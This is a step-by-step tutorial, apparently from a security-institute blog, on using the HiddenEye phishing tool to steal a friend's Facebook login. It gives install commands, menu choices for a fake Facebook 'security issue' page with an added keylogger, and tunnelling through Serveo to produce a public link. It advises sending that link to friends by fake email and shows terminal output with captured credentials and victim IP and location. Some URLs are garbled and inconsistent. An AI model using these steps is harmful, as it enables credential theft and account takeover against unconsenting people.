Hack your friends Facebook account using HiddenEye

Phishing is what mostly victims fall into trap of fake pages. There are many of methods for creating fake pages. Phishing is an way to obtain login credentials such as usernames & passwords or confidential details by creating cloned pages of original web pages. According to ethical hacking researcher of international institute of cyber security most of the attacks are done using phishing techniques.

Even phishing is still most popular cyber attack used by many attackers/ spammers. We will show python script written in python. Modern phishing tool is used phishing tool which gives wide variety of social networks.

  • For testing we will use Ubuntu 16.04.3 LTS 64 Bit. Install python3, php7, wget. For that type sudo apt-get update && sudo apt-get install python3, sudo apt-get install python-pip3, sudo apt-get install wget.
  • After installing above requirements. Type git clone https://github.com/DarkSecDevelopers/HiddenEye.git
  • Then type cd HiddenEye && ls
  • Type pip3 install -r requirements.txt
  • Type python3 HiddenEye.py
  • Type y
HURRAY!! Internet is available.. We can Continue
 PHP INSTALLATION FOUND
 [*] HiddenEye is Opening. Please Wait…100%
 [!] Do you agree to use this tool for educational purposes only? (y/n)
 HiddenEye >>> y
  • Type 1

  ██   ██ ██ ██████   ██████   ███████ ███   ██  ███████ ██    ██ ███████
  ██   ██ ██ ██    ██ ██    ██ ██      ████  ██  ██       ██  ██  ██
  ███████ ██ ██    ██ ██    ██ ███████ ██ ██ ██  ███████   ████   ███████
  ██   ██ ██ ██    ██ ██    ██ ██      ██  ████  ██         ██    ██
  ██   ██ ██ ██████   ██████   ███████ ██   ███  ███████    ██    ███████

                                                     v0.2.7 BY:DARKSEC
             [ Modern Phishing Tool With Advanced Functionality ]
[ PHISHING-KEYLOGGER-INFORMATION COLLECTOR-ALL_IN_ONE_TOOL-SOCIALENGINEERING ]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
------------------------
SELECT ANY ATTACK VECTOR FOR YOUR VICTIM:
------------------------
 [1] Facebook        [10] Yahoo          [19] Pinterest      [28] DropBox
 [2] Google          [11] Twitch         [20] ProtonMail     [29] eBay
 [3] LinkedIn        [12] Microsoft      [21] Spotify        [30] MySpace
 [4] GitHub          [13] Steam          [22] Quora          [31] PayPal
 [5] StackOverflow   [14] VK             [23] PornHub        [32] Shopify
 [6] WordPress       [15] iCloud         [24] Adobe          [33] Verizon
 [7] Twitter         [16] GitLab         [25] Badoo          [34] Yandex
 [8] Instagram       [17] Netflix        [26] CryptoCurrency [35] Reddit
 [9] Snapchat        [18] Origin         [27] DevianArt
HiddenEye >>>
  • Type 3
 [*] SELECT ANY ONE MODE…
 Operation mode:
  [1] Standard Page Phishing
  [2] Advanced Phishing-Poll Ranking Method(Poll_mode/login_with)
  [3] Facebook Phishing- Fake Security issue(security_mode)
  [4] Facebook Phising-Messenger Credentials(messenger_mode)
 HiddenEye >>> 3
  • Type Y
        _  _ . ___  ___  ___ _  _  ___ _  _ ___
        |__| | ]  | ]  | |__ |\ |  |__ \__/ |__
        |  | | ]__| ]__| |__ | \|  |__  ||  |__
        https://github.com/darksecdevelopers
        ** BY: DARKSEC **
-------------------------------
[ KEYLOGGER PROMPT ]!!
-------------------------------
[*]DO YOU WANT TO ADD A KEYLOGGER IN PHISHING PAGE-(Y/N)
 YOUR CHOICE >>> Y
  • Type www.facebook.com
        _  _ . ___  ___  ___ _  _  ___ _  _ ___
        |__| | ]  | ]  | |__ |\ |  |__ \__/ |__
        |  | | ]__| ]__| |__ | \|  |__  ||  |__
        https://github.com/darksecdevelopers
        ** BY:DARKSEC **

-------------------------------
[ PUT YOUR REDIRECTING URL HERE ]
-------------------------------
**(Choose Wisely As Your Victim Will Redirect to This Link)

**(Do not leave it blank. Unless Errors may occur)

[*]Insert a custom redirect url:

REDIRECT HERE>>> www.facebook.com
  • Type 443
[ WEBSERVER PORT SELECTION ]!!
 [*]Select Any Available Port [1-65535]:
 HiddenEye >>> 443
  • Type 2
[ HOST SERVER SELECTION ]!!
[!](SERVEO WORKS BETTER)
[*]Select Any Available Server:
[1]Ngrok
[2]Serveo
 HiddenEye >>> 2
  • Type 2
[ SERVEO URL TYPE SELECTION ]!!
 [!]REMEMBER ? Serveo Don't Allows Phishing.
 [!]They Drops The Connection Whenever Detects Phishing.
 [*]CHOOSE ANY SERVEO URL TYPE TO GENERATE PHISHING LINK:
 [1]Custom URL (Generates designed url)
 [2]Random URL (Generates Random url)
 YOUR CHOICE >>> 2

 [ RANDOM SERVEO URL ]!!
 [!] SEND THIS SERVEO URL TO VICTIMS-
 [] Localhost URL: https://127.0.0.1:443 
 [] SERVEO URL: https://viduo.serveo.net
 ……………………………………………………………….
 [!] IF FOUND SEGMENTATION FAULT, IT MEANS THE SERVER FAILED.            |
 [!] THEN YOU HAVE TO RUN IT AGAIN.                                      |
 [!] Use This Command In Another Terminal.                               |
 (cd Server/www/ && php -S 127.0.0.1:443 > /dev/null)                   |
 ……………………………………………………………….
 [*] Waiting For Victim Interaction. Keep Eyes On Requests Coming From Victim …
 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  • Open another temrinal & go to below location cd /home/iicybersecurity/HiddenEye/ Server/www/ && php -S 127.0.0.1:443 > /dev/null
root@ubuntu:/home/iicybersecurity/HiddenEye# cd Server/www/ && php -S 127.0.0.1:443 > /dev/null
[Fri Aug 2 03:55:35 2019] 127.0.0.1:37156 [200]: /keylogger.php?c=
[Fri Aug 2 03:55:36 2019] 127.0.0.1:37158 [200]: /keylogger.php?c= 
[Fri Aug 2 03:55:37 2019] 127.0.0.1:37160 [200]: /keylogger.php?c= 
[Fri Aug 2 03:55:38 2019] 127.0.0.1:37162 [200]: /keylogger.php?c= 
[Fri Aug 2 03:55:39 2019] 127.0.0.1:37164 [200]: /keylogger.php?c= 
[Fri Aug 2 03:55:40 2019] 127.0.0.1:37166 [200]: /keylogger.php?c= 
[Fri Aug 2 03:55:41 2019] 127.0.0.1:37168 [200]: /keylogger.php?c= 
[Fri Aug 2 03:55:42 2019] 127.0.0.1:37170 [200]: /keylogger.php?c= 
[Fri Aug 2 03:55:43 2019] 127.0.0.1:37172 [200]: /keylogger.php?c= 
[Fri Aug 2 03:55:44 2019] 127.0.0.1:37174 [200]: /keylogger.php?c= 
  • As you will open https://127.0.0.1:443 in your web browser. You will see victim interaction where you have started server.
  • Enter username & password.
  • For sending fake page to your friends you can send fake email to your friends using public URL generated, in this case it is https://viduo.seveo.net. You can send https://viduo.seveo.net & you can also check using your loopback URL for testing on Ubuntu machine, https://127/0/0/1:443
https://viduo.seveo.ne
https://127/0/0/1:443
  • After entering username & password. You will found login credentials in terminal where you have started HiddenEye.py
…………………………………………………………
  [ CREDENTIALS FOUND ]:
 …………………………………………………………
[EMAIL]; meetmichael@gmail.com [PASS]: michael@12345
 …………………………………………………………
 [ VICTIM INFO FOUND ]:
  Victim Public IP: 220.59.157.158
  User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36
 Current logged in user: root
 Longitude: 79.0005 
 Latitude: 22.6000
 ISP: AS17813 
 Country: IN
 Region: Delhi 
 City: Delhi
 …………………………………………………………
 ………………………….
 ………………………….